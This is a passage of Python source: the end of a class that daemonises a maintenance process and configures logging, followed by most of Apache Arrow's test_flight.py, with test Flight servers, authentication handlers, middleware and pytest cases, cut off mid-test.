if self.config["log_dest"] == 'stdout':
foreground = True
else:
self.logger.info("Starting the maintenance on the source %s" % (self.args.source, ))
foreground = False
print("Starting the maintenance process for source %s" % (self.args.source))
keep_fds = [self.logger_fds]
app_name = "%s_maintenance" % self.args.source
maintenance_daemon = Daemonize(app=app_name, pid=maintenance_pid, action=self.pg_engine.run_maintenance, foreground=foreground , keep_fds=keep_fds)
try:
maintenance_daemon.start()
except:
print("The maintenance process is already started. Aborting the command.")
def __init_logger(self, logger_name):
"""
            The method initialises a new logger object using the configuration parameters.
            The formatter differs depending on whether the debug option is enabled.
            The method returns a new logger object and sets the logger's file descriptor in the class variable
            logger_fds, which is used when the process is daemonised.
:param logger_name: the name of the logger used to build the file name and get the correct logger
:return: list with logger and file descriptor
:rtype: list
"""
log_dir = self.config["log_dir"]
log_level = self.config["log_level"]
log_dest = self.config["log_dest"]
log_days_keep = self.config["log_days_keep"]
log_level_map = {
"debug": logging.DEBUG,
"info": logging.INFO,
"warning": logging.WARNING,
"error": logging.ERROR,
"critical": logging.CRITICAL
}
config_name = self.args.config
source_name = self.args.source
debug_mode = self.args.debug
if source_name == '*':
log_name = "%s_general" % (config_name)
elif logger_name == "global":
log_name = "%s_%s" % (config_name, source_name)
else:
log_name = "%s_%s_%s" % (config_name, source_name, logger_name)
log_file = os.path.expanduser('%s/%s.log' % (log_dir,log_name))
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG)
logger.propagate = False
if debug_mode:
str_format = "%(asctime)s %(processName)s %(levelname)s %(filename)s (%(lineno)s): %(message)s"
else:
str_format = "%(asctime)s %(processName)s %(levelname)s: %(message)s"
formatter = logging.Formatter(str_format, "%Y-%m-%d %H:%M:%S")
if log_dest=='stdout' or debug_mode:
fh=logging.StreamHandler(sys.stdout)
elif log_dest=='file':
fh = TimedRotatingFileHandler(log_file, when="d",interval=1,backupCount=log_days_keep)
else:
print("Invalid log_dest value: %s" % log_dest)
sys.exit()
if debug_mode:
log_level = 'debug'
fh.setLevel(log_level_map.get(log_level, logging.DEBUG))
fh.setFormatter(formatter)
logger.addHandler(fh)
logger_fds = fh.stream.fileno()
return [logger, logger_fds]
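    # Usage note: the file descriptor returned alongside the logger is what the calling
    # methods pass to Daemonize through keep_fds, so logging keeps working after the fork.
    # A hypothetical sketch:
    #
    #   logger, logger_fd = self.__init_logger("global")
    #   Daemonize(app="replica", pid=pid_file, action=run, keep_fds=[logger_fd]).start()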
test_flight.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ast
import base64
import itertools
import os
import signal
import struct
import tempfile
import threading
import time
import traceback
import numpy as np
import pytest
import pyarrow as pa
from pyarrow.lib import tobytes
from pyarrow.util import pathlib, find_free_port
from pyarrow.tests import util
try:
from pyarrow import flight
from pyarrow.flight import (
FlightClient, FlightServerBase,
ServerAuthHandler, ClientAuthHandler,
ServerMiddleware, ServerMiddlewareFactory,
ClientMiddleware, ClientMiddlewareFactory,
)
except ImportError:
flight = None
FlightClient, FlightServerBase = object, object
ServerAuthHandler, ClientAuthHandler = object, object
ServerMiddleware, ServerMiddlewareFactory = object, object
ClientMiddleware, ClientMiddlewareFactory = object, object
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight
def test_import():
# So we see the ImportError somewhere
import pyarrow.flight # noqa
def resource_root():
"""Get the path to the test resources directory."""
if not os.environ.get("ARROW_TEST_DATA"):
raise RuntimeError("Test resources not found; set "
"ARROW_TEST_DATA to <repo root>/testing/data")
return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"
def read_flight_resource(path):
"""Get the contents of a test resource file."""
root = resource_root()
if not root:
return None
try:
with (root / path).open("rb") as f:
return f.read()
except FileNotFoundError:
raise RuntimeError(
"Test resource {} not found; did you initialize the "
"test resource submodule?\n{}".format(root / path,
traceback.format_exc()))
def example_tls_certs():
"""Get the paths to test TLS certificates."""
return {
"root_cert": read_flight_resource("root-ca.pem"),
"certificates": [
flight.CertKeyPair(
cert=read_flight_resource("cert0.pem"),
key=read_flight_resource("cert0.key"),
),
flight.CertKeyPair(
cert=read_flight_resource("cert1.pem"),
key=read_flight_resource("cert1.key"),
),
]
}
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)
])
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
CRITERIA = b"the expected criteria"
def __init__(self, location=None, options=None, **kwargs):
super().__init__(location, **kwargs)
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
self.options = options
def list_flights(self, context, criteria):
if criteria == self.CRITERIA:
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table, options=self.options)
class MetadataFlightServer(FlightServerBase):
"""A Flight server that numbers incoming/outgoing data."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_get(self, context, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.GeneratorStream(
table.schema,
self.number_batches(table),
options=self.options)
def do_put(self, context, descriptor, reader, writer):
counter = 0
expected_data = [-10, -5, 0, 5, 10]
while True:
try:
batch, buf = reader.read_chunk()
assert batch.equals(pa.RecordBatch.from_arrays(
[pa.array([expected_data[counter]])],
['a']
))
assert buf is not None
client_counter, = struct.unpack('<i', buf.to_pybytes())
assert counter == client_counter
writer.write(struct.pack('<i', counter))
counter += 1
except StopIteration:
return
@staticmethod
def number_batches(table):
for idx, batch in enumerate(table.to_batches()):
buf = struct.pack('<i', idx)
yield batch, buf
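# The app_metadata convention used by MetadataFlightServer above is just a little-endian
# int32 packed with struct; a minimal round-trip sketch (values are illustrative only):
#
#   buf = struct.pack('<i', 7)
#   idx, = struct.unpack('<i', buf)
#   assert idx == 7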
class EchoFlightServer(FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self, location=None, expected_schema=None, **kwargs):
super().__init__(location, **kwargs)
self.last_message = None
self.expected_schema = expected_schema
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader, writer):
if self.expected_schema:
assert self.expected_schema == reader.schema
self.last_message = reader.read_all()
def do_exchange(self, context, descriptor, reader, writer):
for chunk in reader:
pass
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(max_chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return [context.peer_identity(), context.peer().encode("utf-8")]
raise NotImplementedError
class GetInfoFlightServer(FlightServerBase):
"""A Flight server that tests GetFlightInfo."""
def get_flight_info(self, context, descriptor):
return flight.FlightInfo(
pa.schema([('a', pa.int32())]),
descriptor,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
def get_schema(self, context, descriptor):
info = self.get_flight_info(context, descriptor)
return flight.SchemaResult(info.schema)
class ListActionsFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
@classmethod
def expected_actions(cls):
return [
("action-1", "description"),
("action-2", ""),
flight.ActionType("action-3", "more detail"),
]
def list_actions(self, context):
yield from self.expected_actions()
class ListActionsErrorFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
def list_actions(self, context):
yield ("action-1", "")
yield "foo"
class CheckTicketFlightServer(FlightServerBase):
"""A Flight server that compares the given ticket to an expected value."""
def __init__(self, expected_ticket, location=None, **kwargs):
super().__init__(location, **kwargs)
self.expected_ticket = expected_ticket
def do_get(self, context, ticket):
assert self.expected_ticket == ticket.ticket
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
return flight.RecordBatchStream(table)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class InvalidStreamFlightServer(FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
        assert data1[0].type != data2[0].type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class NeverSendsDataFlightServer(FlightServerBase):
"""A Flight server that never actually yields data."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
if ticket.ticket == b'yield_data':
# Check that the server handler will ignore empty tables
# up to a certain extent
data = [
self.schema.empty_table(),
self.schema.empty_table(),
pa.RecordBatch.from_arrays([range(5)], schema=self.schema),
]
return flight.GeneratorStream(self.schema, data)
return flight.GeneratorStream(
self.schema, itertools.repeat(self.schema.empty_table()))
class SlowFlightServer(FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_get(self, context, ticket):
return flight.GeneratorStream(pa.schema([('a', pa.int32())]),
self.slow_stream())
def do_action(self, context, action):
time.sleep(0.5)
return []
@staticmethod
def slow_stream():
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
yield pa.Table.from_arrays(data1, names=['a'])
# The second message should never get sent; the client should
# cancel before we send this
time.sleep(10)
yield pa.Table.from_arrays(data1, names=['a'])
class ErrorFlightServer(FlightServerBase):
"""A Flight server that uses all the Flight-specific errors."""
def do_action(self, context, action):
if action.type == "internal":
raise flight.FlightInternalError("foo")
elif action.type == "timedout":
raise flight.FlightTimedOutError("foo")
elif action.type == "cancel":
raise flight.FlightCancelledError("foo")
elif action.type == "unauthenticated":
raise flight.FlightUnauthenticatedError("foo")
elif action.type == "unauthorized":
raise flight.FlightUnauthorizedError("foo")
elif action.type == "protobuf":
err_msg = b'this is an error message'
raise flight.FlightUnauthorizedError("foo", err_msg)
raise NotImplementedError
def list_flights(self, context, criteria):
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
raise flight.FlightInternalError("foo")
class ExchangeFlightServer(FlightServerBase):
"""A server for testing DoExchange."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_exchange(self, context, descriptor, reader, writer):
if descriptor.descriptor_type != flight.DescriptorType.CMD:
raise pa.ArrowInvalid("Must provide a command descriptor")
elif descriptor.command == b"echo":
return self.exchange_echo(context, reader, writer)
elif descriptor.command == b"get":
return self.exchange_do_get(context, reader, writer)
elif descriptor.command == b"put":
return self.exchange_do_put(context, reader, writer)
elif descriptor.command == b"transform":
return self.exchange_transform(context, reader, writer)
else:
raise pa.ArrowInvalid(
"Unknown command: {}".format(descriptor.command))
def exchange_do_get(self, context, reader, writer):
"""Emulate DoGet with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
writer.begin(data.schema)
writer.write_table(data)
def exchange_do_put(self, context, reader, writer):
"""Emulate DoPut with DoExchange."""
num_batches = 0
for chunk in reader:
if not chunk.data:
raise pa.ArrowInvalid("All chunks must have data.")
num_batches += 1
writer.write_metadata(str(num_batches).encode("utf-8"))
def exchange_echo(self, context, reader, writer):
"""Run a simple echo server."""
started = False
for chunk in reader:
if not started and chunk.data:
writer.begin(chunk.data.schema, options=self.options)
started = True
if chunk.app_metadata and chunk.data:
writer.write_with_metadata(chunk.data, chunk.app_metadata)
elif chunk.app_metadata:
writer.write_metadata(chunk.app_metadata)
elif chunk.data:
writer.write_batch(chunk.data)
else:
assert False, "Should not happen"
def exchange_transform(self, context, reader, writer):
"""Sum rows in an uploaded table."""
for field in reader.schema:
if not pa.types.is_integer(field.type):
raise pa.ArrowInvalid("Invalid field: " + repr(field))
table = reader.read_all()
sums = [0] * table.num_rows
for column in table:
for row, value in enumerate(column):
sums[row] += value.as_py()
result = pa.Table.from_arrays([pa.array(sums)], names=["sum"])
writer.begin(result.schema)
writer.write_table(result)
class HttpBasicServerAuthHandler(ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
buf = incoming.read()
auth = flight.BasicAuth.deserialize(buf)
if auth.username not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
if self.creds[auth.username] != auth.password:
raise flight.FlightUnauthenticatedError("wrong password")
outgoing.write(tobytes(auth.username))
def is_valid(self, token):
if not token:
raise flight.FlightUnauthenticatedError("token not provided")
if token not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
return token
class HttpBasicClientAuthHandler(ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super().__init__()
self.basic_auth = flight.BasicAuth(username, password)
self.token = None
def authenticate(self, outgoing, incoming):
auth = self.basic_auth.serialize()
outgoing.write(auth)
self.token = incoming.read()
def get_token(self):
return self.token
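# A hedged usage sketch for the basic-auth handler pair above (credentials are
# placeholders; the real wiring is exercised in test_http_basic_auth below):
#
#   with EchoStreamFlightServer(
#           auth_handler=HttpBasicServerAuthHandler(creds={b"user": b"secret"})) as server:
#       client = FlightClient(('localhost', server.port))
#       client.authenticate(HttpBasicClientAuthHandler('user', 'secret'))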
class TokenServerAuthHandler(ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise flight.FlightUnauthenticatedError(
"invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise flight.FlightUnauthenticatedError("invalid token")
return token[7:]
class TokenClientAuthHandler(ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super().__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
class NoopAuthHandler(ServerAuthHandler):
"""A no-op auth handler."""
def authenticate(self, outgoing, incoming):
"""Do nothing."""
def is_valid(self, token):
"""
        Return an empty token.
        Returning None would cause a TypeError.
"""
return ""
def case_insensitive_header_lookup(headers, lookup_key):
"""Lookup the value of given key in the given headers.
The key lookup is case insensitive.
"""
for key in headers:
if key.lower() == lookup_key.lower():
return headers.get(key)
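# For example (illustrative values only):
#   case_insensitive_header_lookup({'Authorization': ['Bearer t']}, 'authorization')
# returns ['Bearer t']; if no key matches, the loop falls through and None is returned.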
class ClientHeaderAuthMiddlewareFactory(ClientMiddlewareFactory):
"""ClientMiddlewareFactory that creates ClientAuthHeaderMiddleware."""
def __init__(self):
self.call_credential = []
def start_call(self, info):
return ClientHeaderAuthMiddleware(self)
def set_call_credential(self, call_credential):
self.call_credential = call_credential
class ClientHeaderAuthMiddleware(ClientMiddleware):
"""
ClientMiddleware that extracts the authorization header
from the server.
This is an example of a ClientMiddleware that can extract
    the bearer token authorization header from an HTTP header
    authentication enabled server.
Parameters
----------
factory : ClientHeaderAuthMiddlewareFactory
This factory is used to set call credentials if an
authorization header is found in the headers from the server.
"""
def __init__(self, factory):
self.factory = factory
def received_headers(self, headers):
auth_header = case_insensitive_header_lookup(headers, 'Authorization')
self.factory.set_call_credential([
b'authorization',
auth_header[0].encode("utf-8")])
class HeaderAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Validates incoming username and password."""
def start_call(self, info, headers):
auth_header = case_insensitive_header_lookup(
headers,
'Authorization'
)
values = auth_header[0].split(' ')
token = ''
error_message = 'Invalid credentials'
if values[0] == 'Basic':
decoded = base64.b64decode(values[1])
pair = decoded.decode("utf-8").split(':')
if not (pair[0] == 'test' and pair[1] == 'password'):
raise flight.FlightUnauthenticatedError(error_message)
token = 'token1234'
elif values[0] == 'Bearer':
token = values[1]
if not token == 'token1234':
raise flight.FlightUnauthenticatedError(error_message)
else:
raise flight.FlightUnauthenticatedError(error_message)
return HeaderAuthServerMiddleware(token)
class HeaderAuthServerMiddleware(ServerMiddleware):
"""A ServerMiddleware that transports incoming username and passowrd."""
def __init__(self, token):
self.token = token
def sending_headers(self):
return {'authorization': 'Bearer ' + self.token}
class HeaderAuthFlightServer(FlightServerBase):
"""A Flight server that tests with basic token authentication. """
def do_action(self, context, action):
middleware = context.get_middleware("auth")
if middleware:
auth_header = case_insensitive_header_lookup(
middleware.sending_headers(), 'Authorization')
values = auth_header.split(' ')
return [values[1].encode("utf-8")]
raise flight.FlightUnauthenticatedError(
'No token auth middleware found.')
class ArbitraryHeadersServerMiddlewareFactory(ServerMiddlewareFactory):
"""A ServerMiddlewareFactory that transports arbitrary headers."""
def start_call(self, info, headers):
return ArbitraryHeadersServerMiddleware(headers)
class ArbitraryHeadersServerMiddleware(ServerMiddleware):
"""A ServerMiddleware that transports arbitrary headers."""
def __init__(self, incoming):
self.incoming = incoming
def sending_headers(self):
return self.incoming
class ArbitraryHeadersFlightServer(FlightServerBase):
"""A Flight server that tests multiple arbitrary headers."""
def do_action(self, context, action):
middleware = context.get_middleware("arbitrary-headers")
if middleware:
headers = middleware.sending_headers()
header_1 = case_insensitive_header_lookup(
headers,
'test-header-1'
)
header_2 = case_insensitive_header_lookup(
headers,
'test-header-2'
)
value1 = header_1[0].encode("utf-8")
value2 = header_2[0].encode("utf-8")
return [value1, value2]
raise flight.FlightServerError("No headers middleware found")
class HeaderServerMiddleware(ServerMiddleware):
"""Expose a per-call value to the RPC method body."""
def __init__(self, special_value):
self.special_value = special_value
class HeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Expose a per-call hard-coded value to the RPC method body."""
def start_call(self, info, headers):
return HeaderServerMiddleware("right value")
class HeaderFlightServer(FlightServerBase):
"""Echo back the per-call hard-coded value."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
if middleware:
return [middleware.special_value.encode()]
return [b""]
class MultiHeaderFlightServer(FlightServerBase):
"""Test sending/receiving multiple (binary-valued) headers."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
headers = repr(middleware.client_headers).encode("utf-8")
return [headers]
class SelectiveAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Deny access to certain methods based on a header."""
def start_call(self, info, headers):
if info.method == flight.FlightMethod.LIST_ACTIONS:
# No auth needed
return
token = headers.get("x-auth-token")
if not token:
raise flight.FlightUnauthenticatedError("No token")
token = token[0]
if token != "password":
raise flight.FlightUnauthenticatedError("Invalid token")
return HeaderServerMiddleware(token)
class SelectiveAuthClientMiddlewareFactory(ClientMiddlewareFactory):
def start_call(self, info):
return SelectiveAuthClientMiddleware()
class SelectiveAuthClientMiddleware(ClientMiddleware):
def sending_headers(self):
return {
"x-auth-token": "password",
}
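# How the selective-auth middleware halves above are wired together (a sketch with the
# classes defined in this file; the actual assertions live in the middleware tests below):
#
#   with HeaderFlightServer(middleware={
#           "test": SelectiveAuthServerMiddlewareFactory()}) as server:
#       client = FlightClient(('localhost', server.port),
#                             middleware=[SelectiveAuthClientMiddlewareFactory()])
#       list(client.do_action(flight.Action("", b"")))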
class RecordingServerMiddlewareFactory(ServerMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info, headers):
self.methods.append(info.method)
return None
class RecordingClientMiddlewareFactory(ClientMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info):
self.methods.append(info.method)
return None
class MultiHeaderClientMiddlewareFactory(ClientMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self):
# Read in test_middleware_multi_header below.
# The middleware instance will update this value.
self.last_headers = {}
def start_call(self, info):
return MultiHeaderClientMiddleware(self)
class MultiHeaderClientMiddleware(ClientMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
EXPECTED = {
"x-text": ["foo", "bar"],
"x-binary-bin": [b"\x00", b"\x01"],
}
def __init__(self, factory):
self.factory = factory
def sending_headers(self):
return self.EXPECTED
def received_headers(self, headers):
# Let the test code know what the last set of headers we
# received were.
self.factory.last_headers = headers
class MultiHeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def start_call(self, info, headers):
return MultiHeaderServerMiddleware(headers)
class MultiHeaderServerMiddleware(ServerMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self, client_headers):
self.client_headers = client_headers
def sending_headers(self):
return MultiHeaderClientMiddleware.EXPECTED
class LargeMetadataFlightServer(FlightServerBase):
"""Regression test for ARROW-13253."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata = b' ' * (2 ** 31 + 1)
def do_get(self, context, ticket):
schema = pa.schema([('a', pa.int64())])
return flight.GeneratorStream(schema, [
(pa.record_batch([[1]], schema=schema), self._metadata),
])
def do_exchange(self, context, descriptor, reader, writer):
writer.write_metadata(self._metadata)
def test_flight_server_location_argument():
locations = [
None,
'grpc://localhost:0',
('localhost', find_free_port()),
]
for location in locations:
with FlightServerBase(location) as server:
assert isinstance(server, FlightServerBase)
def test_server_exit_reraises_exception():
with pytest.raises(ValueError):
with FlightServerBase():
raise ValueError()
@pytest.mark.slow
def test_client_wait_for_available():
location = ('localhost', find_free_port())
server = None
def serve():
global server
time.sleep(0.5)
server = FlightServerBase(location)
server.serve()
client = FlightClient(location)
thread = threading.Thread(target=serve, daemon=True)
thread.start()
started = time.time()
client.wait_for_available(timeout=5)
elapsed = time.time() - started
assert elapsed >= 0.5
def test_flight_list_flights():
"""Try a simple list_flights call."""
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
assert list(client.list_flights()) == []
flights = client.list_flights(ConstantFlightServer.CRITERIA)
assert len(list(flights)) == 1
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ConstantFlightServer(options=options) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
# Also test via RecordBatchReader interface
data = client.do_get(flight.Ticket(b'ints')).to_reader().read_all()
assert data.equals(table)
with pytest.raises(flight.FlightServerError,
match="expected IpcWriteOptions, got <class 'int'>"):
with ConstantFlightServer(options=42) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.pandas
def test_do_get_ints_pandas():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_pandas()
assert list(data['some_ints']) == table.column(0).to_pylist()
def test_flight_do_get_dicts():
table = simple_dicts_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
def test_flight_do_get_ticket():
"""Make sure Tickets get passed to the server."""
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
with CheckTicketFlightServer(expected_ticket=b'the-ticket') as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'the-ticket')).read_all()
assert data.equals(table)
def test_flight_get_info():
"""Make sure FlightEndpoint accepts string and object URIs."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_flight_info(flight.FlightDescriptor.for_command(b''))
assert info.total_records == -1
assert info.total_bytes == -1
assert info.schema == pa.schema([('a', pa.int32())])
assert len(info.endpoints) == 2
assert len(info.endpoints[0].locations) == 1
assert info.endpoints[0].locations[0] == flight.Location('grpc://test')
assert info.endpoints[1].locations[0] == \
flight.Location.for_grpc_tcp('localhost', 5005)
def test_flight_get_schema():
"""Make sure GetSchema returns correct schema."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_schema(flight.FlightDescriptor.for_command(b''))
assert info.schema == pa.schema([('a', pa.int32())])
def test_list_actions():
"""Make sure the return type of ListActions is validated."""
# ARROW-6392
with ListActionsErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(
flight.FlightServerError,
match=("Results of list_actions must be "
"ActionType or tuple")
):
list(client.list_actions())
with ListActionsFlightServer() as server:
client = FlightClient(('localhost', server.port))
assert list(client.list_actions()) == \
ListActionsFlightServer.expected_actions()
class ConvenienceServer(FlightServerBase):
"""
Server for testing various implementation conveniences (auto-boxing, etc.)
"""
@property
def simple_action_results(self):
return [b'foo', b'bar', b'baz']
def do_action(self, context, action):
if action.type == 'simple-action':
return self.simple_action_results
elif action.type == 'echo':
return [action.body]
elif action.type == 'bad-action':
return ['foo']
elif action.type == 'arrow-exception':
raise pa.ArrowMemoryError()
def test_do_action_result_convenience():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
# do_action as action type without body
results = [x.body for x in client.do_action('simple-action')]
assert results == server.simple_action_results
# do_action with tuple of type and body
body = b'the-body'
results = [x.body for x in client.do_action(('echo', body))]
assert results == [body]
def test_nicer_server_exceptions():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightServerError,
match="a bytes-like object is required"):
list(client.do_action('bad-action'))
# While Flight/C++ sends across the original status code, it
# doesn't get mapped to the equivalent code here, since we
# want to be able to distinguish between client- and server-
# side errors.
with pytest.raises(flight.FlightServerError,
match="ArrowMemoryError"):
list(client.do_action('arrow-exception'))
def test_get_port():
"""Make sure port() works."""
server = GetInfoFlightServer("grpc://localhost:0")
try:
assert server.port > 0
finally:
server.shutdown()
@pytest.mark.skipif(os.name == 'nt',
reason="Unix sockets can't be tested on Windows")
def test_flight_domain_socket():
"""Try a simple do_get call over a Unix domain socket."""
with tempfile.NamedTemporaryFile() as sock:
sock.close()
location = flight.Location.for_grpc_unix(sock.name)
with ConstantFlightServer(location=location):
client = FlightClient(location)
reader = client.do_get(flight.Ticket(b'ints'))
table = simple_ints_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
reader = client.do_get(flight.Ticket(b'dicts'))
table = simple_dicts_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with EchoFlightServer(expected_schema=data.schema) as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with EchoStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with InvalidStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightTimedOutError):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
options = flight.FlightCallOptions(timeout=5.0)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
@pytest.mark.slow
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*unauthenticated.*"):
